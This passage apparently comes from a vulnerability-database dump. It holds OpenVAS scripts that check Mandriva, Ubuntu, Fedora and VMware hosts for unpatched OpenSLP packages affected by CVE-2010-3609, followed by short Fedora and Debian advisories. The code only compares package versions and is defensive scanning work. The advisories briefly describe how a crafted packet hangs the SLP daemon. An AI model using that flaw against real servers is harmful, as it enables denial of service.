isrpmvuln(pkg:\"lib64openslp1\", rpm:\"lib64openslp1~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1-devel\", rpm:\"lib64openslp1-devel~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenslp1\", rpm:\"libopenslp1~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenslp1-devel\", rpm:\"libopenslp1-devel~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1\", 
rpm:\"lib64openslp1~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1-devel\", rpm:\"lib64openslp1-devel~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2012-08-24T00:00:00", "id": "OPENVAS:1361412562310831727", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831727", "type": "openvas", "title": "Mandriva Update for openslp MDVSA-2012:141 (openslp)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for openslp MDVSA-2012:141 (openslp)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:141\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831727\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-24 09:57:24 +0530 (Fri, 24 Aug 2012)\");\n script_cve_id(\"CVE-2010-3609\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"MDVSA\", value:\"2012:141\");\n script_name(\"Mandriva Update for openslp MDVSA-2012:141 (openslp)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openslp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|mes5\\.2)\");\n script_tag(name:\"affected\", value:\"openslp on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered and corrected in openslp:\n\n The extension parser in slp_v2message.c in OpenSLP 1.2.1 allows\n remote attackers to cause a denial of service (infinite loop) via a\n 
packet with a next extension offset that references this extension\n or a previous extension (CVE-2010-3609).\n\n The updated packages have been patched to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenslp1\", rpm:\"libopenslp1~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenslp1-devel\", rpm:\"libopenslp1-devel~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1\", rpm:\"lib64openslp1~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1-devel\", rpm:\"lib64openslp1-devel~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenslp1\", rpm:\"libopenslp1~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenslp1-devel\", rpm:\"libopenslp1-devel~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1\", rpm:\"lib64openslp1~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) 
!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openslp1-devel\", rpm:\"lib64openslp1-devel~1.2.1~12.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-12-04T11:26:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1118-1", "modified": "2017-12-01T00:00:00", "published": "2011-05-10T00:00:00", "id": "OPENVAS:840637", "href": "http://plugins.openvas.org/nasl.php?oid=840637", "type": "openvas", "title": "Ubuntu Update for openslp-dfsg USN-1118-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1118_1.nasl 7964 2017-12-01 07:32:11Z santu $\n#\n# Ubuntu Update for openslp-dfsg USN-1118-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that OpenSLP incorrectly handled certain corrupted\n messages. A remote attacker could send a specially crafted packet to\n the OpenSLP server and cause it to hang, leading to a denial of service.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1118-1\";\ntag_affected = \"openslp-dfsg on Ubuntu 10.10 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 8.04 LTS ,\n Ubuntu 6.06 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1118-1/\");\n script_id(840637);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-10 14:04:15 +0200 (Tue, 10 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"USN\", value: \"1118-1\");\n script_cve_id(\"CVE-2010-3609\");\n script_name(\"Ubuntu Update for openslp-dfsg USN-1118-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n 
script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.6ubuntu0.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.5ubuntu0.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-5ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.7ubuntu0.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.1ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609", "CVE-2012-4428"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-06-09T00:00:00", "id": "OPENVAS:1361412562310869371", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310869371", "type": "openvas", "title": "Fedora Update for openslp FEDORA-2015-7561", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openslp FEDORA-2015-7561\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869371\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 10:43:33 +0200 (Tue, 09 Jun 2015)\");\n script_cve_id(\"CVE-2010-3609\", \"CVE-2012-4428\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for openslp FEDORA-2015-7561\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openslp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", 
value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"openslp on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-7561\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-May/159059.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.1~22.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-19T16:08:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609", "CVE-2010-2059", "CVE-2010-3316", "CVE-2010-3614", "CVE-2010-3613", "CVE-2010-3762", "CVE-2010-3435", "CVE-2010-3853"], "description": "The remote ESXi is missing one or more security related Updates from VMSA-2011-0004.3.", "modified": "2019-12-18T00:00:00", "published": "2012-03-16T00:00:00", "id": "OPENVAS:1361412562310103453", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103453", "type": "openvas", "title": "VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm (VMSA-2011-0004.3)", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n#\n# VMSA-2011-0004.3 VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103453\");\n script_cve_id(\"CVE-2010-3613\", \"CVE-2010-3614\", \"CVE-2010-3762\", \"CVE-2010-3316\", \"CVE-2010-3435\", \"CVE-2010-3853\", \"CVE-2010-2059\", \"CVE-2010-3609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm (VMSA-2011-0004.3)\");\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-03-16 10:51:14 +0100 (Fri, 16 Mar 2012)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2012 
Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2011-0004.html\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more patch(es).\");\n\n script_tag(name:\"summary\", value:\"The remote ESXi is missing one or more security related Updates from VMSA-2011-0004.3.\");\n\n script_tag(name:\"affected\", value:\"VMware ESXi 4.1 without patch ESXi410-201101201-SG\n\n VMware ESXi 4.0 without patch ESXi400-201103401-SG\n\n VMware ESX 4.1 without patches ESX410-201101201-SG, ESX410-201104407-SG and ESX410-201110207-SG\n\n VMware ESX 4.0 without patches ESX400-201103401-SG, ESX400-201103404-SG, ESX400-201103406-SG and ESX400-201103407-SG\");\n\n script_tag(name:\"impact\", value:\"a. Service Location Protocol daemon DoS\n\n Exploitation of this vulnerability could cause SLPD to consume significant CPU resources.\");\n\n script_tag(name:\"insight\", value:\"Service Location Protocol daemon (SLPD) denial of service issue and ESX 4.0 Service Console OS (COS) updates\n for bind, pam, and rpm.\n\n a. Service Location Protocol daemon DoS\n\n This patch fixes a denial-of-service vulnerability in the Service Location Protocol daemon (SLPD).\n\n b. Service Console update for bind\n\n This patch updates the bind-libs and bind-utils RPMs to version 9.3.6-4.P1.el5_5.3, which resolves multiple security\n issues.\n\n c. Service Console update for pam\n\n This patch updates the pam RPM to pam_0.99.6.2-3.27.5437.vmw, which resolves multiple security issues with PAM modules.\n\n d. 
Service Console update for rpm, rpm-libs, rpm-python, and popt\n\n This patch updates rpm, rpm-libs, and rpm-python RPMs to 4.4.2.3-20.el5_5.1, and popt to version 1.10.2.3-20.el5_5.1, which\n resolves a security issue.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"vmware_esx.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"4.1.0\", \"ESXi410-201101201-SG\",\n \"4.0.0\", \"ESXi400-201103401-SG\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-30T10:48:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609", "CVE-2010-2059", "CVE-2010-3316", "CVE-2010-3614", "CVE-2010-3613", "CVE-2010-3762", "CVE-2010-3435", "CVE-2010-3853"], "description": "The remote ESXi is missing one or more security related Updates from VMSA-2011-0004.3.\n\nSummary\n\nService Location Protocol daemon (SLPD) denial of service issue and ESX 4.0 Service Console OS (COS) updates\nfor bind, pam, and rpm.\n\nRelevant releases\n\nVMware ESXi 4.1 without patch ESXi410-201101201-SG.\nVMware ESXi 4.0 without patch ESXi400-201103401-SG.\nVMware ESX 4.1 without patches ESX410-201101201-SG, ESX410-201104407-SG and ESX410-201110207-SG.\nVMware ESX 4.0 without patches ESX400-201103401-SG, ESX400-201103404-SG, ESX400-201103406-SG and ESX400-201103407-SG.\n\nProblem Description\n\na. Service Location Protocol daemon DoS\n\n This patch fixes a denial-of-service vulnerability in the Service Location Protocol daemon (SLPD). Exploitation of\n this vulnerability could cause SLPD to consume significant CPU resources.\n\nb. 
Service Console update for bind\n\n This patch updates the bind-libs and bind-utils RPMs to version 9.3.6-4.P1.el5_5.3, which resolves multiple security\n issues.\n\nc. Service Console update for pam\n\n This patch updates the pam RPM to pam_0.99.6.2-3.27.5437.vmw, which resolves multiple security issues with PAM modules.\n\nd. Service Console update for rpm, rpm-libs, rpm-python, and popt\n\n This patch updates rpm, rpm-libs, and rpm-python RPMs to 4.4.2.3-20.el5_5.1, and popt to version 1.10.2.3-20.el5_5.1, which\n resolves a security issue.", "modified": "2017-10-26T00:00:00", "published": "2012-03-16T00:00:00", "id": "OPENVAS:103453", "href": "http://plugins.openvas.org/nasl.php?oid=103453", "type": "openvas", "title": "VMSA-2011-0004.3 VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2011-0004.nasl 7583 2017-10-26 12:07:01Z cfischer $\n#\n# VMSA-2011-0004.3 VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"The remote ESXi is missing one or more security related Updates from VMSA-2011-0004.3.\n\nSummary\n\nService Location Protocol daemon (SLPD) denial of service issue and ESX 4.0 Service Console OS (COS) updates\nfor bind, pam, and rpm.\n\nRelevant releases\n\nVMware ESXi 4.1 without patch ESXi410-201101201-SG.\nVMware ESXi 4.0 without patch ESXi400-201103401-SG.\nVMware ESX 4.1 without patches ESX410-201101201-SG, ESX410-201104407-SG and ESX410-201110207-SG.\nVMware ESX 4.0 without patches ESX400-201103401-SG, ESX400-201103404-SG, ESX400-201103406-SG and ESX400-201103407-SG.\n\nProblem Description\n\na. Service Location Protocol daemon DoS\n\n This patch fixes a denial-of-service vulnerability in the Service Location Protocol daemon (SLPD). Exploitation of\n this vulnerability could cause SLPD to consume significant CPU resources.\n\nb. Service Console update for bind\n\n This patch updates the bind-libs and bind-utils RPMs to version 9.3.6-4.P1.el5_5.3, which resolves multiple security\n issues.\n\nc. Service Console update for pam\n\n This patch updates the pam RPM to pam_0.99.6.2-3.27.5437.vmw, which resolves multiple security issues with PAM modules.\n\nd. 
Service Console update for rpm, rpm-libs, rpm-python, and popt\n\n This patch updates rpm, rpm-libs, and rpm-python RPMs to 4.4.2.3-20.el5_5.1, and popt to version 1.10.2.3-20.el5_5.1, which\n resolves a security issue.\";\n\ntag_solution = \"Apply the missing patch(es).\";\n\nif (description)\n{\n script_id(103453);\n script_cve_id(\"CVE-2010-3613\", \"CVE-2010-3614\", \"CVE-2010-3762\", \"CVE-2010-3316\", \"CVE-2010-3435\", \"CVE-2010-3853\", \"CVE-2010-2059\", \"CVE-2010-3609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version (\"$Revision: 7583 $\");\n script_name(\"VMSA-2011-0004.3 VMware ESX/ESXi SLPD denial of service vulnerability and ESX third party updates for Service Console packages bind, pam, and rpm.\");\n\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 14:07:01 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-16 10:51:14 +0100 (Fri, 16 Mar 2012)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\",\"VMware/ESX/version\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://www.vmware.com/security/advisories/VMSA-2011-0004.html\");\n exit(0);\n}\n\ninclude(\"version_func.inc\"); # Used in _esxi_patch_missing()\ninclude(\"vmware_esx.inc\");\n\nif(!get_kb_item('VMware/ESXi/LSC'))exit(0);\nif(! 
esxVersion = get_kb_item(\"VMware/ESX/version\"))exit(0);\n\npatches = make_array(\"4.1.0\",\"ESXi410-201101201-SG\",\n \"4.0.0\",\"ESXi400-201103401-SG\");\n\nif(!patches[esxVersion])exit(0);\n\nif(_esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n\n security_message(port:0);\n exit(0);\n\n}\n\nexit(99);\n\n\n\n\n\n\n\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3609", "CVE-2012-4428"], "description": "Service Location Protocol is an IETF standards track protocol that provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks. OpenSLP is an open source implementation of the SLPv2 protocol as defined by RFC 2608 and RFC 2614. ", "modified": "2015-05-27T16:29:19", "published": "2015-05-27T16:29:19", "id": "FEDORA:66039603513B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: openslp-1.2.1-22.fc20", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:25:24", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3609", "CVE-2012-4428", "CVE-2015-5177"], "description": "Package : openslp-dfsg\nVersion : 1.2.1-7.8+deb6u1\nCVE ID : CVE-2010-3609 CVE-2012-4428 CVE-2015-5177\nDebian Bug : 623551 687597 795429\n\nSeveral issues have been found and solved in OpenSLP, that implements the\nInternet Engineering Task Force (IETF) Service Location Protocol standards\nprotocol.\n\nCVE-2010-3609\n\n Remote attackers could cause a Denial of Service in the Service Location\n Protocol daemon (SLPD) via a crafted packet with a \"next extension offset\".\n\nCVE-2012-4428\n\n Georgi Geshev discovered that an out-of-bounds read error in the\n SLPIntersectStringList() function could be used to cause a DoS.\n\nCVE-2015-5177\n\n A double free in the
